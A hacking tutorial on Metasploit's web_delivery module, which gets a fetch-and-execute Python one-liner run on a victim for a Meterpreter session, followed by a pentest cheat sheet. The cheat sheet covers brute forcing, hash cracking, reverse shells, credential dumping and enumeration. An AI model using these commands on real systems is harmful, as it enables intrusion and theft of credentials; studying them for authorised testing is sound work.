Metasploit Basics for Hackers Part 25 Web Delivery with Linux/UNIX/OsX 2023

Metasploit, one of my favourite hacking/pentesting tools, has so many capabilities that even after my many tutorials I have only scratched the surface of its abilities. For instance, it can be used with Nexpose for vulnerability scanning, with nmap for port scanning, and, with its numerous auxiliary modules, for nearly limitless other hacking-related tasks.

Among the exploit modules, a class that we have not yet addressed are the web delivery exploits. These modules start a web server on the attack machine and then generate a short script command that, when executed on the victim machine, opens a Meterpreter session on the target. The web delivery module can use Python, PHP, or Windows PowerShell for that script.

Of course, it is your job to get the script onto the target machine.

This means you will probably need physical access to the machine, or you will need to wrap the command in something that looks harmless to the user. In this tutorial, we will exploit a Linux or Mac system. Since both are UNIX-like systems, they have traditionally shipped with a Python interpreter by default (note that recent macOS releases no longer include one, so check for a python or python3 binary on the target first). If we can get the command generated by this module to run on the target, we will have control of the system as that user, including keystroke logging, turning on the webcam, recording from the microphone, and reading or deleting any files that user can access.

Let's get started.

Step 1: Open a Terminal

The first step, of course, is to fire up Kali and open a terminal.

Step 2: Start Metasploit & Load the Exploit

Next, start Metasploit by typing:

kali> msfconsole

This should open the msfconsole.

Then we need to load the exploit:

msf > use exploit/multi/script/web_delivery

Set the IP of our attack system:

msf > set LHOST 192.168.181.153

And set the port we want to use:

msf > set LPORT 4444

Of course, I am using my private IP address in my lab, but if the target is outside your LAN, you will probably need to use your public IP and then port forward. Note that LHOST and LPORT are where the payload connects back to; the web server that serves the stage is controlled separately by SRVHOST and SRVPORT (8080 by default), and that port must be reachable from the target as well.

Step 3: Show Options

Now that we have the exploit loaded and ready to go, let's check the options for this exploit. Type:

msf > show options

It looks like we have all the options set as we want. Now, let's get a bit more information on this exploit before we proceed. Type:

msf > info

As you can read above, this exploit starts a web server on our attack system and, when the command it generates is executed on the target system, the payload is downloaded to the victim and run from memory. In addition, because the attack does not write the payload to disk, it should not trigger file-based antivirus on the victim's system. It is not invisible, though: the interpreter's command line (which contains the download URL) and the outbound HTTP request to our server are both visible to process and network monitoring.

Step 4: Start the Exploit

Our next step is to run the exploit. This starts the web server on our attack system and also generates a Python command that we can use to connect to this web server. Before we do that, though, we need to set the target to 0, selecting the Python stager (run show targets to confirm the numbering in your Metasploit version, as the target list has grown over time):

msf > set target 0

Now, we can type exploit:

msf > exploit

Note that the last thing this exploit writes is "Run the following command on the target machine" followed by the command we need to use. Copy this command.

Step 5: Run the Command on the Victim System

Next, take that command to the victim system. In this case, I'm using an Ubuntu 14.04 machine. The command does not need root privileges: it runs as whatever user executes it, and the resulting Meterpreter session has that user's privileges (prefix it with sudo only if you want a root session).

Then hit Enter. When you return to your Kali system, you will see that a Meterpreter session has been opened from the target system!

We own that box!

Initially, the Meterpreter session is running in the background. To list it, we can type:

msf > sessions -l

and to bring it to the foreground we interact with it by its session ID:

msf > sessions -i 1

This gives us the meterpreter prompt.

To control the system, we can run the Meterpreter commands or scripts, although most of the scripts are written for Windows systems, and the Python Meterpreter offers a smaller command set than the native Windows one.
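Steps 2 through 5 reduced to what actually happens on the wire, as an added example that is not the tutorial's or Metasploit's own code: the attacker side serves a script over HTTP, and the one-liner run on the victim fetches it and exec()s it in memory. The stage here is a constructed harmless marker rather than Meterpreter, the server binds to localhost on a free port, the URI path is a hypothetical fixed value standing in for the module's random URIPATH, and the one-liner is modelled on what web_delivery prints for its Python target (the exact text differs between versions).

```python
import http.server
import threading
import urllib.request

# Constructed stand-in for the second stage. web_delivery would serve the
# Python Meterpreter here; this script only reports where it ran.
STAGE_SCRIPT = b"""
import os, platform
RESULT = {"pid": os.getpid(), "python": platform.python_version()}
"""

# web_delivery serves its stage at a short random URI (the URIPATH option);
# this one is a hypothetical fixed value for the demo.
STAGE_PATH = "/kXzQ9"


class StageHandler(http.server.BaseHTTPRequestHandler):
    """Attacker side: answer exactly one path with the stage, 404 everything else."""

    def do_GET(self):
        if self.path != STAGE_PATH:
            self.send_error(404)
            return
        self.send_response(200)
        self.send_header("Content-Type", "text/plain")
        self.send_header("Content-Length", str(len(STAGE_SCRIPT)))
        self.end_headers()
        self.wfile.write(STAGE_SCRIPT)

    def log_message(self, *args):
        pass  # keep the demo output to the lines printed below


def start_stage_server(host="127.0.0.1", port=0):
    """Start the web server in a background thread (port 0 = pick a free one).
    Returns (server, stage_url); call server.shutdown() when done."""
    server = http.server.HTTPServer((host, port), StageHandler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server, "http://%s:%d%s" % (host, server.server_address[1], STAGE_PATH)


def victim_command(url):
    """The one-liner to paste on the target, modelled on web_delivery's Python
    target: runs on Python 2 and 3, fetches the stage and exec()s it."""
    return ('python -c "import sys;'
            "u=__import__('urllib'+{2:'',3:'.request'}[sys.version_info[0]],"
            "fromlist=('urlopen',));r=u.urlopen('%s');exec(r.read());\"" % url)


def run_stage(url):
    """What that one-liner does, in plain Python: download the stage over HTTP
    and execute it inside this process. Nothing is written to disk."""
    with urllib.request.urlopen(url) as resp:
        code = resp.read()
    namespace = {}
    exec(compile(code, "<stage>", "exec"), namespace)
    return namespace["RESULT"]


if __name__ == "__main__":
    server, url = start_stage_server()
    print("Run the following command on the target machine:")
    print(victim_command(url))
    print("Stage executed in memory, returned:", run_stage(url))
    server.shutdown()
```

The detection angle follows directly from the code: nothing touches disk, but the victim's process list shows an interpreter whose command line contains the download URL, and the outbound GET to the attacker's SRVPORT is visible on the network. Both are worth alerting on.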

Kali Linux is pre-installed with more than 600 penetration-testing programs, including nmap (a port scanner), Wireshark (a packet analyzer), John the Ripper (a password cracker), Aircrack-ng (a software suite for penetration-testing wireless LANs), and Burp Suite and OWASP ZAP (both web application security scanners).

Kali Linux can run natively when installed on a computer's hard disk, can be booted from a live USB, or can run within a virtual machine. It is a supported platform of the Metasploit Project's Metasploit Framework, a tool for developing and executing security exploits.


NMAP Commands
Nmap ("Network Mapper") is a free and open source utility for network discovery and security auditing. Many systems and network administrators also find it useful for tasks such as network inventory, managing service upgrade schedules, and monitoring host or service uptime.

Nmap uses raw IP packets in novel ways to determine what hosts are available on the network, what services (application name and version) those hosts are offering, what operating systems (and OS versions) they are running, what type of packet filters/firewalls are in use, and dozens of other characteristics.

It was designed to rapidly scan large networks, but works fine against single hosts. Nmap runs on all major computer operating systems, and official binary packages are available for Linux, Windows, and Mac OS X.

Command – Description

nmap -v -sS -A -T4 target – Nmap verbose scan, runs a SYN stealth scan, T4 timing (should be OK on a LAN), OS and service version detection, traceroute and scripts against services
nmap -v -sS -p- -A -T4 target – As above but scans all TCP ports (takes a lot longer)
nmap -v -sU -sS -p- -A -T4 target – As above but scans all TCP ports and UDP ports (takes even longer)
nmap -v -p 445 --script=smb-check-vulns --script-args=unsafe=1 192.168.1.X – Nmap script to scan for vulnerable SMB servers – warning: unsafe=1 may crash the target. smb-check-vulns was removed in Nmap 7; on current versions use the smb-vuln-* scripts instead
ls /usr/share/nmap/scripts/* | grep ftp – Search Nmap scripts for keywords
SMB Enumeration
In computer networking, Server Message Block (SMB), one version of which was also known as Common Internet File System (CIFS), operates as an application-layer network protocol mainly used for providing shared access to files, printers, and serial ports and miscellaneous communications between nodes on a network.

Command – Description

nbtscan 192.168.1.0/24 – Discover Windows / Samba servers on the subnet, finds Windows MAC addresses, NetBIOS name and client workgroup / domain
enum4linux -a target-ip – Do everything, runs all options (find Windows client domain / workgroup) apart from dictionary-based share name guessing

Other Host Discovery
Other methods of host discovery that don't use nmap

Command – Description

netdiscover -r 192.168.1.0/24 – Discovers IP, MAC address and MAC vendor on the subnet from ARP, useful for confirming you're on the right VLAN at $client site
Python Local Web Server
Python local web server command, handy for serving up shells and exploits on an attacking machine.

python -m SimpleHTTPServer 80 – Run a basic HTTP server (Python 2); on Python 3 the equivalent is python3 -m http.server 80. Great for serving up shells etc. Remember it serves the whole current directory, so run it from a folder that contains only what you mean to hand out.

Mounting File Shares
How to mount NFS / CIFS, Windows and Linux file shares.

mount 192.168.1.1:/vol/share /mnt/nfs – Mount NFS share to /mnt/nfs
mount -t cifs -o username=user,password=pass,domain=blah //192.168.1.X/share-name /mnt/cifs – Mount Windows CIFS / SMB share on Linux at /mnt/cifs. If you omit password it will prompt on the CLI (more secure, as it won't end up in bash_history)
net use Z: \\win-server\share password /user:domain\janedoe /savecred /p:no – Mount a Windows share on Windows from the command line
apt-get install smb4k -y – Install smb4k on Kali, useful Linux GUI for browsing SMB shares
Basic Fingerprinting
Service fingerprinting here means connecting to a port and reading the banner the daemon displays, which usually reveals the software name and version. (This is not device or browser fingerprinting, which identifies clients rather than servers.)

nc -v 192.168.1.1 25
telnet 192.168.1.1 25 – Basic versioning / fingerprinting via the displayed banner

SNMP Enumeration
SNMP enumeration is the process of using SNMP to enumerate user accounts, running processes, installed software and interfaces on a target system. SNMP employs two major types of software components for communication: the SNMP agent, which is located on the networking device, and the SNMP management station, which communicates with the agent.

snmpcheck -t 192.168.1.X -c public
snmpwalk -c public -v1 192.168.1.X 1 | grep hrSWRunName – Walk the whole tree and pull out running process names
snmpenum -t 192.168.1.X
onesixtyone -c names -i hosts – Try the community strings in the file names against the hosts in the file hosts
DNS Zone Transfers
nslookup -> set type=any -> ls -d blah.com – Windows DNS zone transfer
dig axfr blah.com @ns1.blah.com – Linux DNS zone transfer

DNSRecon
DNSRecon provides the ability to perform:

Check all NS records for zone transfers
Enumerate general DNS records for a given domain (MX, SOA, NS, A, AAAA, SPF and TXT)
Perform common SRV record enumeration
Top level domain (TLD) expansion
Check for wildcard resolution
Brute force subdomain and host A and AAAA records given a domain and a wordlist
Perform a PTR record lookup for a given IP range or CIDR
Check a DNS server's cached records for A, AAAA and CNAME records, given a list of host records in a text file to check
Enumerate common mDNS records in the local network
Enumerate hosts and subdomains using Google

DNS Enumeration Kali – DNSRecon
root@kali:~# dnsrecon -d target -D /usr/share/wordlists/dnsmap.txt -t std --xml output.xml

HTTP / HTTPS Webserver Enumeration
nikto -h 192.168.1.1 – Perform a nikto scan against target
dirbuster – Configure via GUI, CLI input doesn't work most of the time

Packet Inspection
tcpdump tcp port 80 -w output.pcap -i eth0 – tcpdump for port 80 on interface eth0, outputs to output.pcap
Username Enumeration
Some techniques used to remotely enumerate users on a target system.

SMB User Enumeration

python /usr/share/doc/python-impacket-doc/examples/samrdump.py 192.168.XXX.XXX – Enumerate users from SMB (current Kali installs the Impacket examples as commands, e.g. impacket-samrdump)
ridenum.py 192.168.XXX.XXX 500 50000 dict.txt – RID cycle SMB / enumerate users from SMB

SNMP User Enumeration

snmpwalk -c public -v1 192.168.X.XXX 1 | grep 77.1.2.25 | cut -d" " -f4 – Enumerate users from SNMP (the 1.3.6.1.4.1.77.1.2.25 subtree is the Windows LanMan user table)
snmpwalk -c public -v1 192.168.X.XXX 1.3.6.1.4.1.77.1.2.25 – Walk only that user subtree instead of the whole tree. This replaces the original cheat sheet's "samrdump.py SNMP" entry: samrdump.py talks SMB/MSRPC and has no SNMP mode
nmap -sU -p 161 192.168.X.0/24 -oG snmp_results.txt (then grep) – Search for SNMP servers with nmap, grepable output. SNMP is UDP, so a TCP connect scan (-sT) will not find it
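Instead of grepping snmp_results.txt by eye, the grepable output can be parsed properly; this is an added example for the "then grep" step above and is not part of Nmap or the original cheat sheet. The scan output below is constructed, but follows the real -oG layout (Host: ip (name), a tab, then Ports: entries of the form port/state/proto/owner/service/rpc/version/). The point a practitioner wants from a UDP scan is the distinction between a confirmed open port (the host answered SNMP) and open|filtered (no reply at all), which the helper keeps apart.

```python
import re

# Constructed sample of -oG output from a UDP scan of port 161 (not real scan data).
SAMPLE_OG = (
    "# Nmap 7.94 scan initiated as: nmap -sU -p 161 -oG snmp_results.txt 192.168.1.0/24\n"
    "Host: 192.168.1.1 (gw.lab)\tStatus: Up\n"
    "Host: 192.168.1.1 (gw.lab)\tPorts: 161/open/udp//snmp///\n"
    "Host: 192.168.1.5 ()\tStatus: Up\n"
    "Host: 192.168.1.5 ()\tPorts: 161/open|filtered/udp//snmp///\n"
    "Host: 192.168.1.9 ()\tStatus: Up\n"
    "Host: 192.168.1.9 ()\tPorts: 161/closed/udp//snmp///, 22/open/tcp//ssh//OpenSSH 6.6.1p1/\n"
    "# Nmap done -- 256 IP addresses (3 hosts up) scanned\n"
)

HOST_RE = re.compile(r"^Host: (\S+) \(([^)]*)\)")


def parse_grepable(text):
    """Return one dict per (host, port) entry found on a Ports: line."""
    entries = []
    for line in text.splitlines():
        m = HOST_RE.match(line)
        if not m or "Ports:" not in line:
            continue  # comment lines and the Status: Up lines carry no ports
        ip, hostname = m.group(1), m.group(2)
        # Fields on a host line are TAB separated; keep only the Ports: field
        ports_field = next(f for f in line.split("\t") if f.startswith("Ports:"))
        for raw in ports_field[len("Ports:"):].split(","):
            f = raw.strip().split("/")
            if len(f) < 7:
                continue  # malformed entry, skip rather than guess
            entries.append({
                "ip": ip, "hostname": hostname,
                "port": int(f[0]), "state": f[1], "proto": f[2],
                "service": f[4], "version": f[6],
            })
    return entries


def hosts_in_state(entries, port, proto, state="open"):
    """Sorted IPs where port/proto is in exactly this state. For UDP,
    'open|filtered' means nothing came back (maybe filtered, maybe silent),
    whereas 'open' means the host actually answered the SNMP probe."""
    return sorted({e["ip"] for e in entries
                   if e["port"] == port and e["proto"] == proto and e["state"] == state})


if __name__ == "__main__":
    parsed = parse_grepable(SAMPLE_OG)
    print("confirmed SNMP agents:", hosts_in_state(parsed, 161, "udp"))
    print("no answer (open|filtered):", hosts_in_state(parsed, 161, "udp", "open|filtered"))
```

Feed the confirmed list to snmpwalk or onesixtyone; the open|filtered hosts are worth a second pass with a known community string before writing them off.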

Passwords
Wordlists

/usr/share/wordlists – Linux word lists

Brute Forcing Services
Hydra FTP Brute Force

Hydra is a parallelized login cracker which supports numerous protocols to attack. It is very fast and flexible, and new modules are easy to add. This tool makes it possible for researchers and security consultants to show how easy it would be to gain unauthorized access to a system remotely. On Ubuntu it can be installed from the Synaptic package manager. On Kali Linux, it is pre-installed.

hydra -l USERNAME -P /usr/share/wordlists/nmap.lst -f 192.168.X.XXX ftp -V – Hydra FTP brute force

Hydra POP3 Brute Force

hydra -l USERNAME -P /usr/share/wordlists/nmap.lst -f 192.168.X.XXX pop3 -V – Hydra POP3 brute force

Hydra SMTP Brute Force

hydra -P /usr/share/wordlists/nmap.lst 192.168.X.XXX smtp -V – Hydra SMTP brute force (no username is given here; add one with -l or a list with -L)
Use -t to limit concurrent connections, example: -t 15. Many services lock accounts after a handful of failures, so keep -t low and agree the lockout policy with the client before running this.

Password Cracking
John The Ripper – JTR

John the Ripper is different from tools like Hydra.

Hydra does online brute-forcing by trying username/password combinations against a service daemon like an FTP server or telnet server. John, however, needs the hash first. So the extra challenge for a hacker is to first get the hash that is to be cracked.

Nowadays many hashes are easily crackable using free lookup services and rainbow tables available online. Just visit one of the sites, submit the hash and if the hash is of a common word, the site will show the word almost instantly. These services precompute the hashes of common words and store them in a large database; the bigger the database, the more words are covered. This only works for unsalted hashes: a salted hash (the normal case for /etc/shadow) has to be attacked per hash with a wordlist, which is exactly what John does.

john --wordlist=/usr/share/wordlists/rockyou.txt hashes – JTR password cracking
john --format=descrypt --wordlist=/usr/share/wordlists/rockyou.txt hash.txt – JTR forced descrypt cracking with wordlist
john --format=descrypt hash – JTR forced descrypt brute force (incremental) cracking; afterwards john --show hash prints what was cracked
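The difference between a lookup table and a John-style wordlist attack, as an added example (not John the Ripper's code): a table built once answers any unsalted hash with zero hashing at crack time, while a per-user salt forces every candidate to be rehashed for every target hash. SHA-256 from hashlib stands in for descrypt so the code runs on any Python 3, and the six-word list is a constructed stand-in for rockyou.txt.

```python
import hashlib
import os

# Constructed stand-in for /usr/share/wordlists/rockyou.txt
WORDLIST = ["123456", "password", "letmein", "qwerty", "dragon", "summer2023"]

HASH_CALLS = {"count": 0}  # counts hash computations so the cost of each approach is visible


def h(data):
    HASH_CALLS["count"] += 1
    return hashlib.sha256(data).hexdigest()


def build_lookup_table(words):
    """What an online lookup site does ahead of time: hash the whole wordlist once.
    (Real rainbow tables store hash chains to save space, but the effect is the
    same: one precomputation, then instant answers for any unsalted hash.)"""
    return {h(w.encode()): w for w in words}


def crack_unsalted(hash_hex, table):
    """A single dictionary lookup; no hashing at crack time."""
    return table.get(hash_hex)


def salted_hash(word, salt):
    """Salt prepended to the password; the salt is stored next to the hash,
    as in crypt(3)'s $id$salt$hash layout."""
    return h(salt + word.encode())


def crack_salted(hash_hex, salt, words):
    """The precomputed table is useless now: each candidate must be rehashed
    with this particular salt. This loop is the work John (or hashcat) does."""
    for w in words:
        if salted_hash(w, salt) == hash_hex:
            return w
    return None


def demo(password="dragon"):
    """Crack an unsalted and a salted hash of the same weak password.
    Returns (word_from_table, hashes_at_lookup_time, word_from_wordlist_attack,
    hashes_for_salted_attack)."""
    table = build_lookup_table(WORDLIST)
    HASH_CALLS["count"] = 0
    unsalted_hit = crack_unsalted(hashlib.sha256(password.encode()).hexdigest(), table)
    lookup_cost = HASH_CALLS["count"]

    salt = os.urandom(8)  # per-user random salt, as a real system would store
    target = hashlib.sha256(salt + password.encode()).hexdigest()
    HASH_CALLS["count"] = 0
    salted_hit = crack_salted(target, salt, WORDLIST)
    salted_cost = HASH_CALLS["count"]
    return unsalted_hit, lookup_cost, salted_hit, salted_cost


if __name__ == "__main__":
    print(demo())
```

Two things fall out of the numbers: the salted attack costs one hash per candidate per target (so 10,000 users means 10,000 times the work), and a password that is not in the wordlist at all is not cracked by either method, which is why John's real cost is dominated by the wordlist and rules rather than by the hash function.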

Meterpreter Payloads
Windows reverse Meterpreter payload
set payload windows/meterpreter/reverse_tcp – Windows reverse TCP payload

Windows VNC Meterpreter payload

set payload windows/vncinject/reverse_tcp
set ViewOnly false

Linux reverse Meterpreter payload

set payload linux/meterpreter/reverse_tcp – Meterpreter Linux reverse payload
Meterpreter Cheat Sheet
Useful meterpreter commands. Backslashes in Windows paths are doubled because the Meterpreter console treats a single backslash as an escape character.

upload file c:\\windows – Meterpreter upload file to Windows target
download c:\\windows\\repair\\sam /tmp – Meterpreter download file from Windows target
execute -f c:\\windows\\temp\\exploit.exe – Meterpreter run .exe on target – handy for executing uploaded exploits
execute -f cmd -c – Creates new channel with cmd shell
ps – Meterpreter show processes
shell – Meterpreter get shell on the target
getsystem – Meterpreter attempts privilege escalation on the target
hashdump – Meterpreter attempts to dump the hashes on the target
portfwd add -l 3389 -p 3389 -r target – Meterpreter create port forward to target machine
portfwd delete -l 3389 -p 3389 -r target – Meterpreter delete port forward
Common Metasploit Modules
Local Windows Metasploit Modules (exploits)

use exploit/windows/local/bypassuac – Bypass UAC on Windows 7+. Set target + arch, x86/x64

Auxiliary Metasploit Modules
use auxiliary/scanner/http/dir_scanner – Metasploit HTTP directory scanner
use auxiliary/scanner/http/jboss_vulnscan – Metasploit JBOSS vulnerability scanner
use auxiliary/scanner/mssql/mssql_login – Metasploit MSSQL credential scanner
use auxiliary/scanner/mysql/mysql_version – Metasploit MySQL version scanner
use auxiliary/scanner/oracle/oracle_login – Metasploit Oracle login module

Metasploit PowerShell Modules

use exploit/multi/script/web_delivery – Metasploit PowerShell payload delivery module (the same module used in the tutorial above, with the PSH target selected instead of Python)
post/windows/manage/powershell/exec_powershell – Metasploit upload and run PowerShell script through a session
use exploit/multi/http/jboss_maindeployer – Metasploit JBOSS deploy
use exploit/windows/mssql/mssql_payload – Metasploit MSSQL payload

Post Exploit Windows Metasploit Modules
run post/windows/gather/win_privs – Metasploit show privileges of current user
use post/windows/gather/credentials/gpp – Metasploit grab GPP saved passwords
load mimikatz -> wdigest – Metasploit load Mimikatz (the mimikatz extension is deprecated; on current versions use load kiwi followed by creds_wdigest)
run post/windows/gather/local_admin_search_enum – Identify other machines that the supplied domain user has administrative access to
Amap
The first next-generation scanning tool for pentesters. It attempts to identify applications even if they are running on a different port than normal.

It also identifies non-ASCII based applications. This is achieved by sending trigger packets, and looking up the responses in a list of response strings.

root@kali:~# amap -bqv 192.168.1.15 80
Using trigger file /etc/amap/appdefs.trig ... loaded 30 triggers
Using response file /etc/amap/appdefs.resp ... loaded 346 responses
Using trigger file /etc/amap/appdefs.rpc ... loaded 450 triggers

amap v5.4 (www.thc.org/thc-amap) started at 2014-05-13 19:07:16 - APPLICATION MAPPING mode
Total amount of tasks to perform in plain connect mode: 23

Protocol on 192.168.1.15:80/tcp (by trigger ssl) matches http - banner: \n\n501 Method Not Implemented\n\nMethod Not Implemented\n to /index.html not supported.\n\n\nApache/2.2.22 (Debian) Server at 12
Protocol on 192.168.1.15:80/tcp (by trigger ssl) matches http-apache-2 - banner: \n\n501 Method Not Implemented\n\nMethod Not Implemented\n to /index.html not supported.\n\n\nApache/2.2.22 (Debian) Server at 12
Waiting for timeout on 19 connections ...
